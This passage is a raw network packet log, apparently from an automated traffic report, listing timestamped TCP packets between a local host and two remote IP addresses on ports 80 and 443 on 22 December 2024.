                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.192363024 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.192459106 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.192476034 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.192498922 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.192518950 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.192682028 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.193259001 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.193300009 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.193351984 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.193377972 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.193419933 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.193473101 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.193511009 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.193958998 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.194052935 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.194062948 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.194072008 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.194091082 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.194104910 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.194279909 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.194319963 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.194694996 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.194742918 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.194832087 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.194849014 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.194873095 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.194885015 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.195023060 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.195065022 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.195508957 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.195552111 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.195605993 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.195622921 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.195643902 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.195658922 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.195815086 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.195853949 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.196290970 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.196330070 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.196410894 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.196429014 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.196471930 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.196619034 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.197123051 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.197165012 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.197212934 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.197231054 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.197251081 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.197272062 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.197412968 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.197452068 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.197875977 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.197915077 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.197966099 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.197981119 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.198000908 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.198016882 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.222805023 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.222881079 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.222897053 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.223033905 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.223033905 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.223112106 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.223238945 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.223256111 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.223280907 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.223294020 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.223448992 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.226063013 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.371560097 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.371599913 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.371618032 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.371767044 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.371814013 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.371814013 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.371921062 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.371953011 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.371967077 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.372045994 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.372064114 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.372088909 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.372101068 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.372370958 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.372467995 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.372484922 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.372520924 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.372550011 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.372678995 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.373121977 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.373167038 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.373214006 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.373231888 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.373270988 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.373430967 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.373472929 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.373954058 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.374069929 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.374082088 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.374099016 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.374126911 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.374145985 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.374277115 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.374690056 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.374735117 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.374778986 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.374795914 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.374840975 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.374995947 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.375039101 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.375452995 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.375557899 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.375575066 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.375603914 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.375628948 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.375808954 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.376249075 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.376296043 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.376365900 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.376384020 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.376426935 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.376584053 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.376625061 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.377022982 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.377146959 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.377162933 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.377202988 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.377232075 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.377371073 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.377835035 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.377888918 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.377916098 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.377933025 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.377974987 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.378144979 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.378185987 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.378583908 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.378716946 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.378734112 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.378766060 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.378792048 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.378943920 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.379379034 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.379426956 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.379493952 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.379512072 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.379554033 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.379708052 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.379750013 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.380204916 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.380295992 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.380314112 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.380345106 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.380372047 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.380517960 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.380980968 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.381026983 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.381061077 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.381078959 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.381122112 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.381300926 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.381383896 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.381747961 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.381845951 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.381870031 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.381897926 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.381926060 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.382076025 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.382529020 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.382572889 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.382620096 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.382638931 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.382682085 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.382846117 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.382889986 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.383327007 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.383410931 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.383435011 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.383471012 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.383501053 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.383639097 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.384119987 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.384166956 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.384216070 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.384232998 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.384277105 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.384454012 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.384495974 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.384891987 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.384983063 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.384999990 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.385029078 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.385055065 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.385206938 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.385266066 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.385675907 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.385781050 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.385797977 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.385834932 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.385860920 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.385982037 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.386455059 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.386501074 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.386563063 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.386580944 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.386624098 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.386780024 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.386820078 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.387265921 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.387348890 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.387365103 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.387397051 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.387423992 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.387578964 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.388020039 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.388068914 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.388124943 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.388142109 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.388185024 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.388339996 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.388557911 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.388847113 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.388946056 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.388962984 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.388989925 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.389014959 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.389177084 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.389612913 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.389657021 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.389703035 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.389722109 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.389764071 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.389921904 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.389961958 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.390362978 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.392155886 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.415031910 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.415117025 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.415132046 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.415184975 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.415258884 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.415276051 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.415365934 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.415365934 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.415498972 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.415903091 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.415946960 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.415971041 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.415977955 CET44349882142.250.181.65192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.416008949 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.416054010 CET49882443192.168.2.4142.250.181.65
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.611434937 CET49882443192.168.2.4142.250.181.65
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.611447096 CET44349882142.250.181.65192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.611778975 CET44349882142.250.181.65192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.612260103 CET49882443192.168.2.4142.250.181.65
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.624212027 CET49882443192.168.2.4142.250.181.65
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.671329021 CET44349882142.250.181.65192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.743865967 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.743908882 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.743925095 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.743941069 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.743958950 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.743971109 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.743973970 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.743993044 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.743997097 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.744014978 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.744040966 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.744328976 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.744347095 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.744363070 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.744379044 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.744389057 CET4987280192.168.2.431.41.244.11
